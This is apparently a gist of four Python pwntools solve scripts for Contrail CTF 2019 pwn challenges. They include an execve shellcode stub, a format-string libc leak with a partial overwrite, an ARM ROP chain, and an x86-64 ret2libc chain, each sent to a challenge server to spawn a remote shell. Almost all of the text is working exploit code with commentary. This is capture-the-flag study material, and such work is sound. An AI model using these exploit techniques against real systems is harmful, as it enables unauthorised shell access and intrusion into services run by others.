Contrail CTF 2019 (pokebattle, welcomechain, EasyShellcode, RaspiWorld)
# -*- coding: utf-8 -*-
# Solve script for the Contrail CTF 2019 service on port 2210 (likely the
# "EasyShellcode" challenge named in the gist title): assemble a short x86-64
# stub with pwntools, append "/bin/sh", check the total size, send it, and go
# interactive. Written for Python 2: there asm() returns a str, so the
# concatenation with "/bin/sh" below works; on Python 3 asm() returns bytes
# and the same expression raises TypeError.
from pwn import *
context.update(arch='amd64', os='linux')
host = '114.177.250.4'
port = 2210
s = remote(host, port)
# Four instructions followed by the string they pass to the kernel:
# - mov rdi, [rax]: rdi <- the pointer stored at rax. Presumably rax points at
#   (or at a pointer to) this payload on the target; nothing here establishes
#   that, so confirm against the challenge binary.
# - lea eax, [ebp + 0x3b]: eax <- ebp + 0x3b. This equals 0x3b (execve on
#   x86-64 Linux) only if ebp is 0 when the stub runs; that is an assumption
#   about the target's register state, not something the stub sets up.
# - add rdi, 13: the four instructions assemble to 13 bytes, so rdi + 13 lands
#   on the appended "/bin/sh" provided rdi started at the payload's first byte.
# - syscall: rsi and rdx are left untouched; the stub relies on whatever the
#   target leaves in them.
shellcode = asm("""
mov rdi, [rax]
lea eax, [ebp + 0x3b]
add rdi, 13
syscall
""") + "/bin/sh"
print(disasm(shellcode))
print(len(shellcode))
# Size sanity check against the challenge limit: 0x14 = 20 bytes, exactly the
# 13 instruction bytes plus the 7-byte string. NOTE: assert is stripped under
# `python -O`, so this is a developer check, not a runtime guard.
assert len(shellcode) <= 0x14
s.send(shellcode)
s.interactive()
# -*- coding: utf-8 -*-
# Solve script for the Contrail CTF 2019 service on port 2225 (likely the
# "pokebattle" challenge named in the gist title). Two rounds through the
# program's menu: the first stores a format string as a "name" and triggers it
# to print a pointer, from which a libc address is derived; the second stores
# "/bin/sh" followed by that libc address. Python 2 only: p16()/p64() results
# are concatenated with str literals. The gist rendering dropped the function
# bodies' indentation; it is restored here.
from pwn import *
context.update(arch='amd64', os='linux')
host = '114.177.250.4'
port = 2225
s = remote(host, port)


def pokeball(slot, name):
    """Walk menu option 2: choose `slot`, then submit `name` verbatim.

    `name` goes out with send(), not sendline(), so the caller controls the
    exact bytes (including any trailing newline or NUL).
    """
    s.recvuntil('> ')
    s.sendline('2')
    s.recvuntil('slot : ')
    s.sendline(str(slot))
    s.recvuntil('name : ')
    s.send(name)


def fight():
    """Choose menu option 1; judging by the flow below, this makes the program
    print the stored name (the format string output is read right after it)."""
    s.recvuntil('> ')
    s.sendline('1')


# leak libc_base
# Two-byte value appended after the 40-byte name. The author's "1/16" note
# indicates this partial overwrite is a guess that only lands one run in
# sixteen (presumably four randomised address bits), so a failed run is
# expected and the script is simply re-run.
printf_plt = 0x47b0 # 1/16
# "%75$p" prints the 75th variadic argument as a pointer; "\n" ends the output
# line so recvline() below returns just the hex value, "\x00" ends the string.
fmt_string = "%75$p\n\x00"
# Name layout: format string, 'A' padding up to 40 bytes, then the 2-byte value.
pokeball(0, fmt_string + 'A' * (40 - len(fmt_string)) + p16(printf_plt))
fight()
# The printed pointer is taken as an address 231 bytes into __libc_start_main
# (per the variable name); that offset is specific to the target's libc build.
libc_start_main = int(s.recvline(), 16) - 231
# Distance from __libc_start_main to system in the target's libc; both
# constants are build-specific and must be re-derived for any other libc.
libc_system = libc_start_main + (0x000000000004f440 - 0x0000000000021ab0)
print("libc_start_main: {}".format(hex(libc_start_main)))
# system("/bin/sh")
# Same 40-byte name layout, this time followed by a full 8-byte address.
cmd = "/bin/sh\x00"
pokeball(0, cmd + 'A' * (40 - len(cmd)) + p64(libc_system))
fight()
s.interactive()
# -*- coding: utf-8 -*-
# Solve script for the Contrail CTF 2019 service on port 7777 (likely the
# "RaspiWorld" challenge named in the gist title): a 32-bit ARM ROP chain built
# from the gadget addresses annotated inline, ending in an `svc #0` with the
# register state described in the comment below. context.binary takes
# arch/endianness from ./0.elf, so that file must sit next to this script.
# Python 2 only: p32() output is concatenated with str literals. The chain's
# behaviour depends on the exact order of every word below; do not reorder.
from pwn import *
context.binary = './0.elf'
host = '114.177.250.4'
port = 7777
s = remote(host, port)
# Neither constant is used by the chain below; `vuln` appears only in the
# commented-out line near the end.
_io_puts = 0x17148
vuln = 0x104cc
# r0 = "/bin/sh", r1 = NULL, r2 = NULL, r7=11
# (target register state at the final svc; 11 is execve on 32-bit ARM Linux)
# Buffer fill: 0x40 bytes plus 4 bytes over the saved frame pointer, after which
# the saved return address is reached (offsets come from the author's analysis
# of ./0.elf).
rop_chain = "A" * 0x40
rop_chain += "A" * 4 # dummy fp
# first ret addr
rop_chain += p32(0x1acc0) # 0x0001acc0 : pop {r4, r6, r7, pc}
# stack for 1acc0
rop_chain += "A" * 4 # r4
rop_chain += p32(0x5c46c) # 0x0005c46c : mov r0, r2 ; pop {r4, r5, r6, r7, r8, sb, sl, pc}
rop_chain += "A" * 4
rop_chain += p32(0x65d54) # 0x00065d54 : add r2, sp, #0x24 ; add r1, sp, #0x28 ; blx r6
# stack for 65d54
# nope
# stack for 0x5c46c
rop_chain += "A" * 4 # r4
rop_chain += "A" * 4 # r5
rop_chain += "A" * 4 # r6
rop_chain += p32(11) # r7
rop_chain += "A" * 4 # r8
rop_chain += "A" * 4 # sb
rop_chain += "A" * 4 # sl
rop_chain += p32(0x10c18) #0x00010c18 : pop {r4, r5, r6, pc}
# stack for 0x10c18 (& r0)
# "/bin" and "/sh\x00" are adjacent 4-byte words, so together they form the
# NUL-terminated "/bin/sh" string on the stack (and are popped into r5/r6).
rop_chain += "A" * 4 # r4
rop_chain += "/bin" # r5
rop_chain += "/sh\x00" # r6
rop_chain += p32(0x6d108) # 0x0006d108 : pop {r1, pc}
# stack for 6d108
rop_chain += p32(0x00)
rop_chain += p32(0x10160) # 0x00010160 : pop {r3, pc}
# stack for 10160
rop_chain += p32(0x6d078) # 0x0006d078 : pop {r2, r3} ; bx lr
rop_chain += p32(0x22e80) # 0x00022e80 : pop {lr} ; bx r3
# stack for 22e80
# Final gadget: the system call itself.
rop_chain += p32(0x1d8c8) # 0x0001d8c8 : svc #0 ; pop {r7} ; bx lr
# Leftover from development: presumably returning to vuln after the syscall
# turned out to be unnecessary.
#rop_chain += p32(vuln)
# stack for 6d078
rop_chain += p32(0x00)
rop_chain += p32(0x00)
# stack for 0x1d8c8
rop_chain += p32(0x00)
# Wait for the banner, then deliver the chain (sendline appends "\n").
s.recvuntil("Welcome to Raspi World\n")
s.sendline(rop_chain)
s.interactive()
# -*- coding: utf-8 -*-
# Solve script for the Contrail CTF 2019 service on port 2226 (likely the
# "welcomechain" challenge named in the gist title). Two x86-64 ROP chains:
# the first calls puts() on printf's GOT entry to print a libc address and then
# returns into `welcome_addr` so the program reads a second input; the second
# calls system("/bin/sh") inside libc. Python 2 only: p64() and recv() results
# are concatenated with str literals.
from pwn import *
context.update(arch='amd64', os='linux')
host = '114.177.250.4'
port = 2226
s = remote(host, port)
# Fixed addresses inside the challenge binary (used as absolute values, i.e.
# the binary is treated as non-PIE). The gadget semantics are inferred from
# the names; confirm against the binary.
welcome_addr = 0x400740   # presumably the routine that prompts for input again
puts_plt = 0x4005a0
printf_got = 0x601030
pop_rdi = 0x400853        # presumably `pop rdi ; ret`
ret = 0x00400576          # presumably a lone `ret`
# call puts to leak libc base
# 0x28 bytes of padding reach the saved return address (offset is
# binary-specific).
rop_chain = "A" * 0x28
rop_chain += p64(pop_rdi)
rop_chain += p64(printf_got)
rop_chain += p64(puts_plt)
rop_chain += p64(welcome_addr)
s.recvuntil(": ")
s.sendline(rop_chain)
s.recvline()   # drop the remainder of the program's response line
# puts() stops at the first NUL, so only the 6 significant bytes of the 8-byte
# pointer arrive; pad them back to 8 before unpacking.
libc_printf = u64(s.recv(6) + '\x00\x00')
# Every offset below (printf, system, puts, "/bin/sh") is specific to the
# target's libc build and must be re-derived for any other libc.
libc_base = libc_printf - 0x64e80
print("[+] got libc_base: {}".format(hex(libc_base)))
# system("/bin/sh")
libc_system = libc_base + 0x4f440
libc_puts = libc_base + 0x809c0   # computed but not used below
libc_binsh = libc_base + 0x1b3e9a
rop_chain = "A" * 0x28
rop_chain += p64(pop_rdi)
rop_chain += p64(libc_binsh)
# Extra `ret` before system: presumably inserted to keep the stack 16-byte
# aligned on entry to system; dropping it is a common cause of a crash there.
rop_chain += p64(ret)
rop_chain += p64(libc_system)
s.recvuntil(": ")
s.sendline(rop_chain)
s.interactive()